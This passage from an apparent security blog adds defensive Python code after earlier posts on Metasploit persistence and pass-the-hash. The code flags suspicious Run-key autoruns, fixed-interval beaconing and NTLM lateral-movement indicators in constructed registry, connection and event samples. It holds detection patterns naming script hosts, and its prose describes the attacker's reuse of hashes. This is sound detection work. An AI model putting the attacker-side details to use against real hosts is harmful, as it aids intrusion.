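The persistence step above leaves two things a defender can look for: a script file in a user-writable directory wired into a Run key, and a reconnect attempt every few seconds (the -i 5 interval). As an added example that is not code from the original post or from Metasploit, here is a small hunt over a constructed "reg export" of the Run keys and a constructed connection log; the sample entries, value names and addresses are made up, and the random-name test is a heuristic.<br />

```python
import re
from collections import defaultdict

# Constructed "reg export" of the Run keys (not from a real host).
SAMPLE_REG = r"""
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"OneDrive"="\"C:\\Program Files\\Microsoft OneDrive\\OneDrive.exe\" /background"
"rXqLpVwZ"="C:\\Users\\victim\\AppData\\Local\\Temp\\rXqLpVwZ.vbs"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SecurityHealth"="%windir%\\system32\\SecurityHealthSystray.exe"
"Updater"="wscript.exe //B \"C:\\ProgramData\\upd.vbs\""
"""
SCRIPT_RE = re.compile(r"\.(vbs|vbe|js|jse|wsf|hta|ps1|bat|cmd)\b")
SCRIPT_HOSTS = ("wscript", "cscript", "mshta", "powershell", "rundll32", "regsvr32")
WRITABLE_DIRS = ("\\temp\\", "\\appdata\\", "\\programdata\\", "\\users\\public\\")
VALUE_RE = re.compile(r'^"([^"]+)"="(.*)"$')


def parse_run_keys(text):
    """Yield (key, value_name, command) from .reg text, undoing .reg escaping."""
    key = None
    for line in (l.strip() for l in text.splitlines()):
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
        elif key and (m := VALUE_RE.match(line)):
            yield key, m.group(1), re.sub(r"\\(.)", r"\1", m.group(2))


def looks_random(name):
    """Heuristic for generated names such as 'rXqLpVwZ': letters only, many case flips."""
    flips = sum(a.isupper() != b.isupper() for a, b in zip(name, name[1:]))
    return name.isalpha() and len(name) >= 6 and flips >= 4


def suspicious_autoruns(reg_text):
    """Collect Run entries with at least one reason to take a closer look."""
    findings = []
    for key, name, cmd in parse_run_keys(reg_text):
        low, reasons = cmd.lower(), []
        if SCRIPT_RE.search(low):
            reasons.append("script file")
        if any(h in low for h in SCRIPT_HOSTS):
            reasons.append("script host")
        if any(d in low for d in WRITABLE_DIRS):
            reasons.append("user-writable path")
        if looks_random(name):
            reasons.append("random-looking value name")
        if reasons:
            findings.append({"key": key, "name": name, "command": cmd, "reasons": reasons})
    return findings


def find_beacons(connections, min_count=4, max_jitter=1.0):
    """connections: (src, dst, port, t_seconds). Flags tuples whose connection
    attempts recur at a near-constant interval, the footprint of a fixed retry timer."""
    by_tuple = defaultdict(list)
    for src, dst, port, t in connections:
        by_tuple[(src, dst, port)].append(t)
    hits = []
    for tup, ts in by_tuple.items():
        ts.sort()
        gaps = [b - a for a, b in zip(ts, ts[1:])]
        if len(ts) >= max(min_count, 2) and max(gaps) - min(gaps) <= max_jitter:
            hits.append((tup, round(sum(gaps) / len(gaps), 1)))
    return hits


# Constructed outbound connection log: (src, dst, dst_port, seconds).
SAMPLE_CONNS = [("10.0.0.12", "203.0.113.7", 4444, t) for t in (0, 5.1, 10.0, 15.2, 20.1)] + \
               [("10.0.0.12", "10.0.0.2", 445, t) for t in (3, 9, 40, 41)]
```

On a live host the same functions can be fed the output of reg export for the Run keys and a firewall or NetFlow export, and a flagged Run value names the file to pull for analysis.<br />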
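The pass-the-hash post above and the hashdump note in this one describe the same thing from the attacker's side: a hash lifted from one box reused to authenticate to another. As an added example that is not code from the original posts, here is the defender's side over constructed, simplified Windows event records (4624 logons and 7045 service installs; hosts, accounts and addresses are made up): a local account authenticating over the network with NTLM, one source fanning the same account out to several hosts, and a service appearing on the target seconds after the logon.<br />

```python
import json
from collections import defaultdict
from datetime import datetime

# Constructed, simplified Security/System event records (not real logs).
SAMPLE_LOG = """
{"ts":"2012-04-04T09:40:01","host":"TARGET2","id":4624,"user":"Administrator","domain":"TARGET2","logon_type":3,"auth":"NTLM","src_ip":"10.0.0.5"}
{"ts":"2012-04-04T09:40:03","host":"TARGET2","id":7045,"service":"MbYkQzLp"}
{"ts":"2012-04-04T09:40:30","host":"FILESRV","id":4624,"user":"jdoe","domain":"CORP","logon_type":3,"auth":"Kerberos","src_ip":"10.0.0.7"}
{"ts":"2012-04-04T09:41:10","host":"TARGET3","id":4624,"user":"Administrator","domain":"TARGET3","logon_type":3,"auth":"NTLM","src_ip":"10.0.0.5"}
{"ts":"2012-04-04T09:42:00","host":"FILESRV","id":4624,"user":"svc_backup","domain":"CORP","logon_type":3,"auth":"NTLM","src_ip":"10.0.0.9"}
"""


def parse_events(text):
    events = []
    for line in text.strip().splitlines():
        e = json.loads(line)
        e["t"] = datetime.fromisoformat(e["ts"])
        events.append(e)
    return events


def find_pth_indicators(events, window_sec=300, min_hosts=2, svc_gap_sec=60):
    """Return a list of (kind, src_ip, user, detail) findings."""
    findings = []
    ntlm = [e for e in events
            if e["id"] == 4624 and e["logon_type"] == 3 and e["auth"] == "NTLM"]
    # 1) A *local* account (domain field == target host) logging on over the
    #    network with NTLM: what reusing target1's Administrator hash against
    #    target2 looks like, since no domain controller or Kerberos is involved.
    for e in ntlm:
        if e["domain"].upper() == e["host"].upper():
            findings.append(("local-account-ntlm-network-logon",
                             e["src_ip"], e["user"], e["host"]))
    # 2) Fan-out: one source IP driving the same account onto several hosts
    #    inside a short window (the same hash tried across systems).
    by_key = defaultdict(list)
    for e in ntlm:
        by_key[(e["src_ip"], e["user"].lower())].append(e)
    for (ip, user), evs in by_key.items():
        evs.sort(key=lambda x: x["t"])
        for i, first in enumerate(evs):
            hosts = {x["host"] for x in evs[i:]
                     if (x["t"] - first["t"]).total_seconds() <= window_sec}
            if len(hosts) >= min_hosts:
                findings.append(("ntlm-fan-out", ip, user, sorted(hosts)))
                break
    # 3) A service installed on the target within seconds of the NTLM logon:
    #    psexec-style execution works by creating and starting a service.
    services = [e for e in events if e["id"] == 7045]
    for e in ntlm:
        for s in services:
            gap = (s["t"] - e["t"]).total_seconds()
            if s["host"] == e["host"] and 0 <= gap <= svc_gap_sec:
                findings.append(("service-install-after-ntlm-logon",
                                 e["src_ip"], e["user"], s["service"]))
    return findings


if __name__ == "__main__":
    for finding in find_pth_indicators(parse_events(SAMPLE_LOG)):
        print(*finding)
```

The same rules fit a SIEM query over real 4624/7045 events; the local-account rule in particular is cheap and catches exactly the shared-local-Administrator case the post relies on.<br />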